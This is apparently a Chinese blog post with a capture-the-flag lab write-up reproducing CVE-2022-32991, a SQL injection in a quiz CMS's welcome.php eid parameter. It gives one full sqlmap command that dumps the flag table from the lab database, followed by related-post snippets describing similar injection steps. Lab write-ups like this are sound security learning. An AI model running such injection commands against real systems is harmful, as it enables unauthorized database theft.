春秋云镜:CVE-2022-32991 漏洞复现

于 2024-12-26 15:20:34 发布
阅读量331 收藏 1
点赞数 7
文章标签: 安全 web安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/BovidJang/article/details/144745398
版权

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

通过国家漏洞数据库发现该漏洞的注入点是welcome.php的eid参数

连接目标地址后打开一个登陆界面,先随便注册一个账号然后登陆,登陆后找到带有eid参数的网址后就可以进行sql注入

 打开sqlmap依次查看内容,最终代码如下

sqlmap -u "http://eci-2ze0wroruqkzr0fiamzt.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -D ctf -T flag -C flag --dump

找到flag

BovidJang
关注
Web Based Quiz System SQL注入漏洞复现CVE-2022-32991
千寻的博客
11-25 1173
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
春秋云镜CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2710
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
CVE-2022-32991 漏洞复现
网安小菜鸡
01-17 1520
CVE-2022-32991 漏洞复现
CVE-2022-32991 春秋云镜
biejianghua的博客
11-28 502
CVE-2022-32991
春秋云镜——CVE-2022-32991
qq_51175992的博客
10-10 640
给到提示注入点是welcome.php的eid参数,因此需要在welcome.php的界面下关注get请求的eid参数部分。
[春秋云镜] CVE-2022-32991 靶场详解
weixin_60374959的博客
11-23 2525
本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。-p 指定注入的参数--batch 使用默认方法去执行sql注入--random-agent 随机更换请求头--user-agent 使用指定的请求头--cookie 使用指定cookie。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1739
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 347
个人记录(新手小白)春秋云镜CVE复现过程
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 4101
CVE-2022-22965 Spring远程代码执行漏洞复现
春秋云境:CVE-2022-32991
一只爱吃橙子的羊
11-29 1065
Web Based Quiz System SQL注入漏洞CVE-2022-32991
春秋云镜 CVE-2022-32991靶场
orchid_sea的博客
11-23 681
进入CMS靶场,进入后台发现使用的GET方式传输数据,尝试sqlmap测试注入点。
CVE-2022-32991漏洞复现春秋云镜手工注入sql+自己配置内网环境)
c0529的博客
12-15 682
Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。得到了flag,就可以交了,这些过程证明了该漏洞可以利用于查询该数据库的敏感信息,可以利用这些方式得到数据库中用户的账户密码等等。从onder by 1一直尝试到order by 6,只有6报错,发现该表有五个字段。查询数据库中的所有表的名字,利用数据库自带的表,得到了所有的表。用hackbar插件输入(火狐浏览器)看到了flag表,查询表内的列。
[春秋云境] CVE-2022-32991
cxiaodi的博客
09-16 365
春秋云境
春秋云境】CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境】CVE-2022-32991
ZXW_NUDT的博客
02-22 2581
春秋云境】CVE-2022-32991
春秋云境:CVE-2022-32991(SQL注入)
m0_65712192的博客
04-12 2182
该CMS的welcome.php中存在SQL注入攻击。
春秋云境靶场之CVE-2022-32991
最新发布
qq_58091216的博客
09-13 816
提示我们存在SQL,那么我们就进行SQL注入。
Web Based Quiz System v1.0 SQL 注入漏洞CVE-2022-32991
Flag少侠的博客
06-30 9964
CVE-2022-32991 是一个影响 Web Based Quiz System v1.0 的 SQL 注入漏洞。这个漏洞存在于文件中的eid参数处。攻击者可以通过此漏洞在数据库中执行任意 SQL 语句,从而获取、修改或删除数据库中的数据。根据 CVSS v3 的评分,该漏洞的基础得分为 8.8(高),而在 CVSS v2 中,该漏洞的评分为 6.5(中)。这表明该漏洞在被利用时会对系统造成严重影响。漏洞的主要原因是没有正确地对输入进行过滤和转义,从而使得恶意用户能够插入和执行恶意的 SQL 语句。
春秋云境:CVE-2022-29464
07-28
- *2* *3* [漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)](https://blog.youkuaiyun.com/FODKING/article/details/125746993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值